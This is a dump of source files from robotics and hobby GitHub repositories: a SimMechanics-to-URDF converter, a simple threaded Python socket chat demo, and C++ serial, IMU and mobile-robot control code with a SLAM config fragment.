ngid = gid\n else:\n ngid = jid\n\n self.makeGroup(child, ngid)\n\n\ndef addXMLBlobs(blobs, parentXML):\n if not (blobs is None):\n for blob in blobs:\n addXMLBlob(blob, parentXML)\n\n\ndef addXMLBlob(blob, parentXML):\n if not (blob is None or blob is ''):\n if type(blob) is str:\n blob_el = lxml.etree.fromstring(blob);\n parentXML.append(blob_el);\n else:\n parentXML.append(blob);\n else:\n sys.stderr.write(\"Warning: malformed XMLBlob for: \" + parentXML.get(\"name\") + \"\\n\")\n sys.stderr.write(\"Ignoring it\" + \"\\n\")\n\n\ndef quaternion_matrix(quaternion):\n \"\"\"Return homogeneous rotation matrix from quaternion.\n\n>>> R = quaternion_matrix([0.06146124, 0, 0, 0.99810947])\n>>> numpy.allclose(R, rotation_matrix(0.123, (1, 0, 0)))\nTrue\n\n\"\"\"\n q = numpy.array(quaternion[:4], dtype=numpy.float64, copy=True)\n nq = numpy.dot(q, q)\n if nq < _EPS:\n return numpy.identity(4)\n q *= math.sqrt(2.0 / nq)\n q = numpy.outer(q, q)\n return numpy.array((\n (1.0 - q[1, 1] - q[2, 2], q[0, 1] - q[2, 3], q[0, 2] + q[1, 3], 0.0),\n (q[0, 1] + q[2, 3], 1.0 - q[0, 0] - q[2, 2], q[1, 2] - q[0, 3], 0.0),\n (q[0, 2] - q[1, 3], q[1, 2] + q[0, 3], 1.0 - q[0, 0] - q[1, 1], 0.0),\n (0.0, 0.0, 0.0, 1.0)\n ), dtype=numpy.float64)\n\n\ndef quaternion_from_matrix(matrix):\n \"\"\"Return quaternion from rotation matrix.\n\n>>> R = rotation_matrix(0.123, (1, 2, 3))\n>>> q = quaternion_from_matrix(R)\n>>> numpy.allclose(q, [0.0164262, 0.0328524, 0.0492786, 0.9981095])\nTrue\n\n\"\"\"\n q = numpy.empty((4,), dtype=numpy.float64)\n M = numpy.array(matrix, dtype=numpy.float64, copy=False)[:4, :4]\n t = numpy.trace(M)\n if t > M[3, 3]:\n q[3] = t\n q[2] = M[1, 0] - M[0, 1]\n q[1] = M[0, 2] - M[2, 0]\n q[0] = M[2, 1] - M[1, 2]\n else:\n i, j, k = 0, 1, 2\n if M[1, 1] > M[0, 0]:\n i, j, k = 1, 2, 0\n if M[2, 2] > M[i, i]:\n i, j, k = 2, 0, 1\n t = M[i, i] - (M[j, j] + M[k, k]) + M[3, 3]\n q[i] = t\n q[j] = M[i, j] + M[j, i]\n q[k] = M[k, i] + M[i, k]\n q[3] = M[k, j] - M[j, k]\n q *= 0.5 / math.sqrt(t * M[3, 3])\n return q\n\n\ndef getDictionary(tag):\n \"\"\"Builds a dictionary from the specified xml tag\n where each child of the tag is entered into the dictionary\n with the name of the child tag as the key, and the contents\n as the value. Also removes quotes from quoted values\"\"\"\n x = {}\n for child in tag.childNodes:\n if child.nodeType is child.TEXT_NODE:\n continue\n key = str(child.localName)\n if len(child.childNodes) == 1:\n data = str(child.childNodes[0].data)\n if data[0] == '\"' and data[-1] == '\"':\n if len(data) != 2:\n x[key] = data[1:-1]\n else:\n x[key] = data\n else:\n data = child.childNodes\n x[key] = data\n return x\n\n\ndef getlist(string):\n \"\"\"Splits a string of comma delimited floats to\n a list of floats\"\"\"\n slist = string.split(\",\")\n flist = []\n for s in slist:\n flist.append(float(s))\n return flist\n\n\ndef convert(value, units):\n \"\"\"Convert value from the specified units to mks units\"\"\"\n if units == 'kg' or units == 'm' or units == 'kg*m^2':\n return value\n elif units == 'slug*in^2':\n return value * SLUGININ2KGMM\n elif units == 'slug':\n return value * SLUG2KG\n elif units == 'in':\n return value * INCH2METER\n elif units == 'mm':\n return value * MM2M\n else:\n raise Exception(\"unsupported mass unit: %s\" % units)\n\n\ndef matrixToQuaternion(matrix):\n \"\"\"Concert 3x3 rotation matrix into a quaternion\"\"\"\n (R11, R12, R13, R21, R22, R23, R31, R32, R33) = matrix\n # Build 4x4 matrix\n M = [[R11, R21, R31, 0],\n [R12, R22, R32, 0],\n [R13, R23, R33, 0],\n [0, 0, 0, 1]]\n A = numpy.array(M)\n [w, x, y, z] = quaternion_from_matrix(A)\n return [w, x, y, z]\n\n\ndef Invert4x4Matrix(matrix):\n \"\"\"Invert a 4x4 rototranslation matrix\"\"\"\n ret_mat = numpy.identity(4)\n R = matrix[:3, :3]\n p = matrix[:3, 3]\n ret_mat[:3, :3] = R.transpose()\n ret_mat[:3, 3] = -numpy.dot(R.transpose(), p)\n return ret_mat\n\n\ndef quaternion_to_rpy(quat):\n \"\"\"Convert quaternion into roll pitch yaw list (in degrees)\"\"\"\n rpy = list(euler_from_quaternion(quat))\n for i in range(0, len(rpy)):\n rpy[i] = rpy[i] * 180 / math.pi\n return rpy\n\n\ndef zero(arr):\n \"\"\"Converts any numbers less than 1e-7 to 0 in the array\"\"\"\n for i in range(0, len(arr)):\n if math.fabs(arr[i]) < 1e-7:\n arr[i] = 0\n return arr\n\n\ndef one(arr):\n \"\"\"In the array 'arr', converts any numbers with difference from 1 less than 1e-7 to 1\"\"\"\n for i in range(0, len(arr)):\n if math.fabs(arr[i]) - 1 < 1e-7:\n arr[i] = numpy.sign(arr[i])\n return arr\n\n\ndef getMatrix(offset, quaternion):\n \"\"\"Convert a quaternion + offset to a 4x4 rototranslation matrix\"\"\"\n return_matrix = quaternion_matrix(quaternion)\n return_matrix[:3, 3] = offset\n return return_matrix\n\n\ndef toGazeboPose(offset, quaternion):\n \"\"\"Convert an offset + quaternion to a 6x1 Gazebo pose string\"\"\"\n rpy = list(euler_from_quaternion(quaternion))\n pose = toGazeboPoseFromEuler(offset, rpy);\n\n return pose;\n\ndef toGazeboPoseFromEuler(offset, rpy):\n \"\"\"Convert an offset + Euler angles to a 6x1 Gazebo pose string\"\"\"\n pose = str(offset[0]) + \" \" + str(offset[1]) + \" \" + str(offset[2]) + \" \" + str(rpy[0]) + \" \" + str(rpy[1]) + \" \" + str(rpy[2]);\n\n return pose;\n\ndef toURDFOriginXMLElement(offset, quaternion):\n \"\"\"Convert an offset + quaternion to a origin URDF element\"\"\"\n rpy = list(euler_from_quaternion(quaternion));\n origin_el = toURDFOriginEulerXMLElement(offset,rpy);\n\n return origin_el;\n\ndef toURDFOriginEulerXMLElement(offset, rpy):\n \"\"\"Convert an offset + Euler angles orientation to a origin URDF element\"\"\"\n origin_el = lxml.etree.Element(\"origin\");\n\n origin_el.set(\"rpy\", str(rpy[0]) + \" \" + str(rpy[1]) + \" \" + str(rpy[2]));\n origin_el.set(\"xyz\", str(offset[0]) + \" \" + str(offset[1]) + \" \" + str(offset[2]));\n\n return origin_el;\n\n\nclass CustomTransformManager:\n \"\"\"Custom class to store several transforms between different frames.\n The object can then be queried to obtain the transform between two arbitrary frames. \"\"\"\n\n def __init__(self):\n self.transform_map = {}\n\n def add(self, offset, quaternion, parent, child):\n \"\"\"Store transform for all frames as a list of transform with respect to the world reference frame\"\"\"\n # if parent is the world, store the frame directly\n # print(\"Storing transformation between \" + parent + \" and \" + child)\n # (\"Quaternion : \" +str(quaternion))\n if (parent == WORLD):\n self.transform_map[child] = getMatrix(offset, quaternion)\n # print(str(self.transform_map[child]))\n elif (child == WORLD):\n self.transform_map[parent] = Invert4x4Matrix(getMatrix(offset, quaternion))\n # print(str(self.transform_map[parent]))\n else:\n # check if one between parent and child is already part of the manager\n if (self.transform_map.get(parent) is not None):\n self.transform_map[child] = numpy.dot(self.transform_map[parent], getMatrix(offset, quaternion));\n else:\n sys.stderr.write(\n \"simmechanics_to_urdf: CustomTransformManager: impossible adding a transformation if the parent frame is not already part of the trasforma manager.\\n\")\n sys.stderr.write(\n \" Please file an issue at https://github.com/robotology-playground/simmechanics-to-urdf/issues/new .\\n\");\n assert (False);\n\n def get(self, parent, child):\n \"\"\"Return the rototranslation from child to parent ({}^parent T_child) as offset and quaternion\"\"\"\n # print(\"Getting transformation between \" + parent + \" and \" + child)\n return_matrix = self.getHomTransform(parent, child)\n # print(str(return_matrix))\n off = return_matrix[:3, 3]\n q = quaternion_from_matrix(return_matrix);\n\n return [list(off), list(q)]\n\n def getHomTransform(self, parent, child):\n \"\"\"Return the homogeneous transformation from child to parent ({}^parent T_child) as 4x4 \"\"\"\n if (parent == WORLD and child == WORLD):\n return_matrix = numpy.identity(4)\n elif (parent == WORLD):\n return_matrix = self.transform_map[child]\n elif (child == WORLD):\n return_matrix = Invert4x4Matrix(self.transform_map[parent])\n else:\n return_matrix = numpy.dot(Invert4x4Matrix(self.transform_map[parent]), self.transform_map[child]);\n return return_matrix\n\n\nclass URDFSensorsGenerator:\n \"\"\" Generator for URDF sensors using iDynTree URDF dialect,\n\n See https://github.com/robotology/idyntree/blob/master/doc/model_loading.md .\n \"\"\"\n\n def __init__(self):\n self.dummy = \"\"\n\n def getURDFForceTorque(self, jointName, sensorName, directionChildToParent, frame, origin_el):\n sensor_el = lxml.etree.Element(\"sensor\")\n sensor_el.set(\"name\", sensorName);\n sensor_el.set(\"type\", \"force_torque\");\n parent_el = lxml.etree.SubElement(sensor_el, \"parent\");\n parent_el.set(\"joint\", jointName);\n force_torque_el = lxml.etree.SubElement(sensor_el, \"force_torque\")\n frame_el = lxml.etree.SubElement(force_torque_el, \"frame\")\n if (frame is not None):\n assert(frame == \"child\" or frame == \"parent\" or frame == \"sensor\")\n frame_el.text = frame;\n else:\n frame_el.text = \"child\";\n measure_direction_el = lxml.etree.SubElement(force_torque_el, \"measure_direction\")\n if (directionChildToParent):\n measure_direction_el.text = \"child_to_parent\"\n else:\n measure_direction_el.text = \"parent_to_child\"\n sensor_el.append(origin_el);\n return sensor_el;\n\n def getURDFSensor(self, linkName, sensorType, sensorName, origin_el):\n sensor_el = lxml.etree.Element(\"sensor\")\n sensor_el.set(\"name\", sensorName);\n sensor_el.set(\"type\", sensorType);\n parent_el = lxml.etree.SubElement(sensor_el, \"parent\");\n parent_el.set(\"link\", linkName);\n sensor_el.append(origin_el);\n\n return sensor_el;\n\n\nclass URDFGazeboSensorsGenerator:\n def __init__(self):\n self.dummy = \"\"\n\n def getURDFForceTorque(self, jointName, sensorName, directionChildToParent, sensorBlobs, frame, pose, updateRate=100):\n gazebo_el = lxml.etree.Element(\"gazebo\", reference=jointName)\n sensor_el = lxml.etree.SubElement(gazebo_el, \"sensor\")\n sensor_el.set(\"name\", sensorName);\n always_on_el = lxml.etree.SubElement(sensor_el, \"always_on\")\n always_on_el.text = str(1);\n update_rate_el = lxml.etree.SubElement(sensor_el, \"update_rate\")\n update_rate_el.text = str(updateRate);\n sensor_el.set(\"type\", \"force_torque\");\n force_torque_el = lxml.etree.SubElement(sensor_el, \"force_torque\")\n frame_el = lxml.etree.SubElement(force_torque_el, \"frame\")\n if (frame is not None):\n assert(frame == \"child\" or frame == \"parent\" or frame == \"sensor\")\n frame_el.text = frame;\n else:\n frame_el.text = \"child\";\n pose_el = lxml.etree.SubElement(sensor_el, \"pose\");\n pose_el.text = pose;\n measure_direction_el = lxml.etree.SubElement(force_torque_el, \"measure_direction\")\n if (directionChildToParent):\n measure_direction_el.text = \"child_to_parent\"\n else:\n measure_direction_el.text = \"parent_to_child\"\n\n addXMLBlobs(sensorBlobs, sensor_el)\n\n return gazebo_el;\n\n def getURDFSensor(self, linkName, sensorType, sensorName, pose, updateRate, sensorBlobs):\n # sys.stderr.write(\"Link name is \" + str(linkName) + \"\\n\");\n gazebo_el = lxml.etree.Element(\"gazebo\", reference=linkName)\n sensor_el = lxml.etree.SubElement(gazebo_el, \"sensor\")\n sensor_el.set(\"name\", sensorName);\n always_on_el = lxml.etree.SubElement(sensor_el, \"always_on\")\n always_on_el.text = str(1);\n update_rate_el = lxml.etree.SubElement(sensor_el, \"update_rate\")\n update_rate_el.text = str(updateRate);\n sensor_el.set(\"type\", sensorType);\n pose_el = lxml.etree.SubElement(sensor_el, \"pose\");\n pose_el.text = pose;\n\n addXMLBlobs(sensorBlobs, sensor_el)\n\n return gazebo_el;\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Convert (first generation) SimMechanics XML files to URDF')\n parser.add_argument('filename', nargs='?', help='input SimMechanics (first generation) xml file')\n parser.add_argument('--csv-joints', dest='csv_joints_config', nargs='?', action='store',\n help='CSV joints configuration file (for options of single joints)')\n parser.add_argument('--yaml', dest='yaml_config', nargs='?', action='store',\n help='YAML configuration file (for global options)')\n parser.add_argument('--output', dest='mode', nargs='?', action='store', default='xml',\n help='output mode, possible options are xml (URDF output, default), graph (DOT output) or none')\n parser.add_argument('--outputfile', dest='outputfile_name', nargs='?', action='store',\n help='output file, use to save the output to a file (if not given the output is printed in the terminal)')\n\n '''\n argc = len(sys.argv)\n if argc == 3:\n filename = sys.argv[1]\n yaml_config = None\n mode = sys.argv[2]\n elif argc == 4:\n filename = sys.argv[1]\n yaml_config = sys.argv[2]\n mode = sys.argv[3]\n else:\n print(\"Usage: \" + sys.argv[0] + \"{XML filename} --yaml [yaml_configfile] --csv-joints [csv_joints_configfile] --output {xml|graph|none}\")\n '''\n args = parser.parse_args()\n\n con = Converter()\n con.convert(args.filename, args.yaml_config, args.csv_joints_config, args.mode, args.outputfile_name)\n\n\nif __name__ == '__main__':\n main()\n" } ]
5
Crwing/my_chat_pro
https://github.com/Crwing/my_chat_pro
08a23620d2c264e8ffc0af3dc527dcb42065a1e6
a8a92c06825a1cf7951ede1cf2517403830eb4c5
de7e85cfa3e134ffc515c75418f45c42a2708993
refs/heads/master
2023-01-20T07:04:43.201067
2020-11-16T05:30:08
2020-11-16T05:30:08
311,849,600
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6012084484100342, "alphanum_fraction": 0.6193353533744812, "avg_line_length": 15.550000190734863, "blob_id": "b346729f6ae3b0da15de5ef53b9c63451f22873e", "content_id": "47f5c4ebcf34d95be311ad77abd0fa99786be952", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 359, "license_type": "no_license", "max_line_length": 67, "num_lines": 20, "path": "/demo/testThread.py", "repo_name": "Crwing/my_chat_pro", "src_encoding": "UTF-8", "text": "import threading\n\nimport threading\nimport time\n\n\ndef show(arg):\n time.sleep(1)\n print(\"thread \" + str(arg) + \" running......\")\n\n\nfor i in range(10):\n t = threading.Thread(target=show, args=(i,)) # 注意传入的参数一定是一个元组!\n print('This is the main program', i)\n t.start()\n\nfor i in range(10):\n time.sleep(1)\n\nprint('end')\n" }, { "alpha_fraction": 0.6594203114509583, "alphanum_fraction": 0.6823671460151672, "avg_line_length": 32.119998931884766, "blob_id": "3a3b643390099a8b81b557bc8863d8b4e664d404", "content_id": "75314f8e967d808cb09726fbd503fb589218c480", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 828, "license_type": "no_license", "max_line_length": 82, "num_lines": 25, "path": "/demo/client.py", "repo_name": "Crwing/my_chat_pro", "src_encoding": "UTF-8", "text": "import socket\nimport threading\n\n\ndef receive_message(client_socket):\n while True:\n recv_messsage = client_socket.recv(1024)\n if recv_messsage:\n print('Message Recieved: ')\n print(recv_messsage.decode('UTF-8'))\n\n\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient_socket.connect(('45.32.130.93', 9001))\nuserName = input('Please input your user name:')\ntargetUserName = input(\"Please input your friend's name:\")\nmessDict = {'userName': userName, 'targetUserName': targetUserName, 'content': ''}\n\nthread = threading.Thread(target=receive_message, args=(client_socket,))\nthread.start()\nwhile True:\n message = ''\n message = input('Please input message: ')\n message = targetUserName + '/' + userName + '/' + message\n client_socket.send(message.encode('UTF-8'))\n" }, { "alpha_fraction": 0.6098505854606628, "alphanum_fraction": 0.6189817190170288, "avg_line_length": 31.26785659790039, "blob_id": "f1a0834b9d498314806f97dc13884c653e0852a3", "content_id": "6255108e5838988a1250a373929938a33884f821", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3614, "license_type": "no_license", "max_line_length": 108, "num_lines": 112, "path": "/demo/server.py", "repo_name": "Crwing/my_chat_pro", "src_encoding": "UTF-8", "text": "import socket\nimport threading\nimport queue\nimport time\nimport sys\n\n\ndef split_message(message):\n splited_messages = message.split('/')\n targetContact = splited_messages[0]\n sourceContact = splited_messages[1]\n messageContent = splited_messages[2]\n return targetContact, sourceContact, messageContent\n\n\ndef add_message2queue(targetContact, sourceContact, meesageContent, contactDict):\n message = targetContact + '/' + sourceContact + '/' + meesageContent\n try:\n q = contactDict[targetContact]\n except KeyError as e:\n q = queue.Queue()\n print(message)\n q.put(message)\n contactDict[targetContact] = q\n else:\n q.put(message)\n\n\ndef find_address_by_user(target_user, user_address_dict):\n return user_address_dict[target_user]\n\n\ndef log_user_address(souceContact, addr, user_address_dict):\n try:\n address = user_address_dict[souceContact]\n except KeyError as e:\n user_address_dict[souceContact] = addr\n\n\ndef send_queue_message(sock, contactsDict, user_address_dict, my_addr):\n while True:\n time.sleep(1)\n if not contactsDict:\n print('currently no message in queue')\n send_contactsDict = dict(contactsDict)\n for target_user, message_queue in send_contactsDict.items():\n try:\n addr = find_address_by_user(target_user, user_address_dict)\n except KeyError as e:\n continue\n if my_addr != addr:\n continue\n while not message_queue.empty():\n mix_message = message_queue.get().split('/')\n sourceContact = mix_message[0]\n messageContent = mix_message[2]\n message = 'You friend ' + sourceContact + ' send a message to you:' + messageContent + '\\n'\n sock.sendto(message.encode('UTF-8'), addr)\n if message_queue.empty():\n try:\n contactsDict.pop(target_user)\n except KeyError as e:\n continue\n\n\ndef receive_message(sock, addr, contactsDict, user_address_dict):\n print(addr)\n sock.setblocking(0)\n thread = threading.Thread(target=send_queue_message, args=(sock, contactsDict, user_address_dict, addr))\n thread.start()\n while True:\n try:\n message = sock.recv(1024)\n except BlockingIOError as e:\n time.sleep(2)\n message = None\n continue\n if message:\n messageDecoded = message.decode('UTF-8')\n if messageDecoded:\n targetContact, sourceContact, messageContent = split_message(messageDecoded)\n add_message2queue(targetContact, sourceContact, messageContent, contactsDict)\n log_user_address(sourceContact, addr, user_address_dict)\n print(messageDecoded)\n # return_message = get_recvd_message(sourceContact, contactsDict)\n # sock.sendto(return_message.encode('UTF-8'), addr)\n else:\n print('Click')\n sys.exit()\n break\n\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.bind(('45.32.130.93', 9001))\nserver_socket.listen(5)\nthreads = []\nuser_address_dict = {}\ncontactsDict = {}\n\nprint('Waiting for connection...')\n\nfor i in range(10):\n sock, addr = server_socket.accept()\n print(sock, addr)\n thread = threading.Thread(target=receive_message, args=(sock, addr, contactsDict, user_address_dict))\n thread.start()\n threads.append(thread)\n\nprint('all thread are started')\n\nfor j in threads:\n j.join()\n" }, { "alpha_fraction": 0.5789473652839661, "alphanum_fraction": 0.6315789222717285, "avg_line_length": 22.75, "blob_id": "d11dc887526e0466690e8ee95550e2fea685075c", "content_id": "132bc356437dc42fc0e52bb7be85d1de5b971436", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "no_license", "max_line_length": 42, "num_lines": 4, "path": "/demo/test_dict.py", "repo_name": "Crwing/my_chat_pro", "src_encoding": "UTF-8", "text": "dict1 = {'hello': 'hello', 'fuck': 'fuck'}\ndict2 = dict(dict1)\ndict2.pop('hello')\nprint(dict1)\n" } ]
4
ntrexlab/STELLA
https://github.com/ntrexlab/STELLA
d42259bb9f24cf2e32671b07ad7921d7abdfd507
40dde3e15ff3ca6a1db245068488e8fb2ec629f5
07041f9e158454690ccbd5f1e83fc9ea97c2f24c
refs/heads/main
2023-07-15T17:01:31.531709
2021-08-20T08:49:21
2021-08-20T08:49:21
385,102,537
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4183523952960968, "alphanum_fraction": 0.46525946259498596, "avg_line_length": 35.043479919433594, "blob_id": "ebd6f6d52cfb4603c5695037bcd6f884b12cad04", "content_id": "412110efbd1c10307b55a0f41de5496ef8405915", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3411, "license_type": "no_license", "max_line_length": 92, "num_lines": 92, "path": "/stella/stella_ahrs/src/listener.cpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include \"listener.h\"\r\n\r\nvoid *AHRS_thread(void *arg)\r\n{\r\n while (run)\r\n {\r\n if (MW_SerialRecv(&id, &length, data))\r\n {\r\n switch ((int)(unsigned char)data[1])\r\n {\r\n case ACC:\r\n acc_x = ((int)(unsigned char)data[2] | (int)(unsigned char)data[3] << 8);\r\n acc_y = ((int)(unsigned char)data[4] | (int)(unsigned char)data[5] << 8);\r\n acc_z = ((int)(unsigned char)data[6] | (int)(unsigned char)data[7] << 8);\r\n\r\n imu.linear_acceleration.x = acc_x / 1000.0 * 9.8;\r\n imu.linear_acceleration.y = acc_y / 1000.0 * 9.8;\r\n imu.linear_acceleration.z = acc_z / 1000.0 * 9.8;\r\n break;\r\n\r\n case GYO:\r\n gyo_x = ((int)(unsigned char)data[2] | (int)(unsigned char)data[3] << 8);\r\n gyo_y = ((int)(unsigned char)data[4] | (int)(unsigned char)data[5] << 8);\r\n gyo_z = ((int)(unsigned char)data[6] | (int)(unsigned char)data[7] << 8);\r\n\r\n imu.angular_velocity.x = gyo_x / 10.0 * 0.01745;\r\n imu.angular_velocity.y = gyo_y / 10.0 * 0.01745;\r\n imu.angular_velocity.z = gyo_z / 10.0 * 0.01745;\r\n break;\r\n\r\n case DEG:\r\n\t\tdeg_x = ((int)(unsigned char)data[2] | (int)(unsigned char)data[3] << 8);\r\n deg_y = ((int)(unsigned char)data[4] | (int)(unsigned char)data[5] << 8);\r\n deg_z = ((int)(unsigned char)data[6] | (int)(unsigned char)data[7] << 8);\r\n\r\n float x = deg_x / 100.0;\r\n float y = deg_y / 100.0;\r\n float z = deg_z / 100.0;\r\n\r\n imu.orientation.w = (COS(z) * COS(y) * COS(x)) + (SIN(z) * SIN(y) * SIN(x));\r\n imu.orientation.x = (COS(z) * COS(y) * SIN(x)) - (SIN(z) * SIN(y) * COS(x));\r\n imu.orientation.y = (COS(z) * SIN(y) * COS(x)) + (SIN(z) * COS(y) * SIN(x));\r\n imu.orientation.z = (SIN(z) * COS(y) * COS(x)) - (COS(z) * SIN(y) * SIN(x));\r\n break;\r\n }\r\n }\r\n }\r\n}\r\n int main(int argc, char **argv)\r\n {\r\n pthread_t thread;\r\n\r\n ros::init(argc, argv, \"mw_ahrs\");\r\n ros::NodeHandle n;\r\n ros::Publisher chatter_pub = n.advertise<sensor_msgs::Imu>(\"imu\", 10);\r\n\r\n MW_SerialOpen(\"/dev/AHRS\", 115200);\r\n pthread_create(&thread, NULL, AHRS_thread, NULL);\r\n\r\n imu.orientation_covariance = {0.0025, 0, 0, 0, 0.0025, 0, 0, 0, 0.0025};\r\n imu.angular_velocity_covariance = {0.02, 0, 0, 0, 0.02, 0, 0, 0, 0.02};\r\n imu.linear_acceleration_covariance = {0.04, 0, 0, 0, 0.04, 0, 0, 0, 0.04};\r\n\r\n imu.linear_acceleration.x = 0;\r\n imu.linear_acceleration.y = 0;\r\n imu.linear_acceleration.z = 0;\r\n\r\n imu.angular_velocity.x = 0;\r\n imu.angular_velocity.y = 0;\r\n imu.angular_velocity.z = 0;\r\n\r\n imu.orientation.w = 0;\r\n imu.orientation.x = 0;\r\n imu.orientation.y = 0;\r\n imu.orientation.z = 0;\r\n\r\n ros::Rate rate(10);\r\n\r\n while (ros::ok())\r\n {\r\n imu.header.frame_id = \"imu_link\";\r\n imu.header.stamp = ros::Time::now();\r\n\r\n chatter_pub.publish(imu);\r\n\r\n ros::spinOnce();\r\n rate.sleep();\r\n }\r\n run = false;\r\n pthread_join(thread,NULL);\r\n return 0;\r\n }\r\n \r\n" }, { "alpha_fraction": 0.59375, "alphanum_fraction": 0.6177884340286255, "avg_line_length": 32.66666793823242, "blob_id": "86c739bdea2dfd892809c421a5a8c145257451c9", "content_id": "3c24689074594e055ae970bddf271e9987321ef1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 416, "license_type": "no_license", "max_line_length": 89, "num_lines": 12, "path": "/stella/stella_md/src/mobilerobot.cpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include \"mobilerobot.h\"\r\n\r\nvoid calculate_wheel_vel(float linear, float angular, float *left_rpm, float *right_rpm)\r\n{\r\n float left_speed = 0.0, right_speed = 0.0;\r\n\r\n left_speed = (linear + wheel_to_wheel_d / 2.0 * angular) * motor_scale_const;\r\n right_speed = (linear - wheel_to_wheel_d / 2.0 * angular) * motor_scale_const;\r\n\r\n *left_rpm = left_speed * -1;\r\n *right_rpm = right_speed * -1;\r\n}\r\n" }, { "alpha_fraction": 0.6938775777816772, "alphanum_fraction": 0.7020407915115356, "avg_line_length": 22.700000762939453, "blob_id": "a20f4697f94823915dbc584e000309128d9dacec", "content_id": "0cea045c59ceda801f73f06b6e259dbcfdf67b40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 245, "license_type": "no_license", "max_line_length": 55, "num_lines": 10, "path": "/stella/stella_ahrs/src/MwSerial.hpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include \"SerialTypedf.hpp\"\r\n#include \"SerialCOM.hpp\"\r\n#include \"UsbSerial.hpp\"\r\n\r\n\r\nint MW_SerialOpen(char *Port, int BaudRate);\r\n\r\nint MW_SerialRecv(long *ID, int *length, char data[8]);\r\n\r\nint MW_SerialSend(long ID, int length, char data[8]);" }, { "alpha_fraction": 0.6525423526763916, "alphanum_fraction": 0.6549636721611023, "avg_line_length": 15.574467658996582, "blob_id": "8fa76a5dd538cbd6f22b926aff38348c0e8cb061", "content_id": "497d7c78aa74e575bfd0898fe1af79d332647652", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 826, "license_type": "no_license", "max_line_length": 53, "num_lines": 47, "path": "/stella/stella_ahrs/src/UsbSerial.hpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include <deque>\r\n\r\n#include \"UsbPacket.hpp\"\r\n#include \"SerialCOM.hpp\"\r\n\r\n#include \"Lock.hpp\"\r\n\r\nusing namespace std;\r\ntypedef unsigned int UINT;\r\ntypedef void *LPVOID;\r\n\r\nstatic deque<Usb2Packet> _queueReceive;\r\n\r\nclass SerialCoM;\r\n\r\nclass UsbSerial\r\n{\r\npublic:\r\n UsbSerial();\r\n ~UsbSerial();\r\n\r\n pthread_t ThreadTransmit_;\r\n pthread_t ThreadReceive_;\r\n\r\n void ThreadStart();\r\n void ThreadStop();\r\n void *ThreadTransmit();\r\n void *ThreadReceive();\r\n static void *ThreadReceiveStatic(LPVOID pParam);\r\n static void *ThreadTransmitStatic(LPVOID pParam);\r\n bool ReceiveSerialMessage(SerialMessage &pkt);\r\n\r\n bool _stopReqThreadTransmit;\r\n bool _stopReqThreadReceive;\r\n\r\n \r\n\r\nprotected:\r\n UsbPacket *_bus;\r\n SerialCOM *_bus2;\r\n\r\nprivate:\r\n \r\n CLock _lockReceive;\r\n \r\n\r\n};\r\n" }, { "alpha_fraction": 0.5929918885231018, "alphanum_fraction": 0.5929918885231018, "avg_line_length": 13.458333015441895, "blob_id": "365238b0c73907e20179fbe1da928aeac8e807f8", "content_id": "66a4959b3087129597d206d0481e1559d3023e6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 371, "license_type": "no_license", "max_line_length": 49, "num_lines": 24, "path": "/stella/stella_ahrs/src/SerialCOM.hpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#pragma once\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <termios.h>\r\n#include <unistd.h>\r\n\r\n\r\nclass SerialCOM\r\n{\r\nprivate:\r\n\r\npublic:\r\n SerialCOM();\r\n ~SerialCOM();\r\n\r\n int Usb_Serial_Open(char *str, int BaudRate);\r\n int __Read(char *buff);\r\n int __Write(char *buff, int length);\r\n void Close();\r\n};\r\n" }, { "alpha_fraction": 0.48681896924972534, "alphanum_fraction": 0.5553602576255798, "avg_line_length": 54.900001525878906, "blob_id": "169cfaf138448bac3a6f46bc5a9d1487483737f2", "content_id": "1e576883ecfebf0764afaa4b29896b03fe62ae4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 703, "license_type": "no_license", "max_line_length": 114, "num_lines": 10, "path": "/stella/stella_md/src/mobilerobot.h", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#define wheel_to_wheel_d 0.337 // 바퀴와 바퀴 간 거리 [m]\r\n#define distance_per_rev 0.5652 // 한바퀴 회전시 이동 거리 [m / rev]\r\n#define pulse_per_rev 54000 // 한바퀴 회전시 엔코더 펄스 카운트(이 값은 부착된 엔코더와 감속기를 고려해 정해진다.) [pulse / rev]\r\n#define pulse_per_distance 95541.4012739 // 1m 이동시 엔코더 펄스 카운트 [pulse / m]\r\n#define gear_ratio 27 // 감속비\r\n#define motor_scale_const 106.1032954 // m/s to rpm\r\n\r\n\r\n\r\nvoid calculate_wheel_vel(float linear, float angular, float *left_rpm, float *right_rpm);\r\n" }, { "alpha_fraction": 0.6731571555137634, "alphanum_fraction": 0.7009735703468323, "avg_line_length": 31.395349502563477, "blob_id": "0c5f5105da3e093f57447ca491b124d5b65c3286", "content_id": "d3d957a89370a084998d28b448e0b6f8efca49cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 1438, "license_type": "no_license", "max_line_length": 111, "num_lines": 43, "path": "/stella_slam/config/stella_backup.lua", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "include \"map_builder.lua\"\r\ninclude 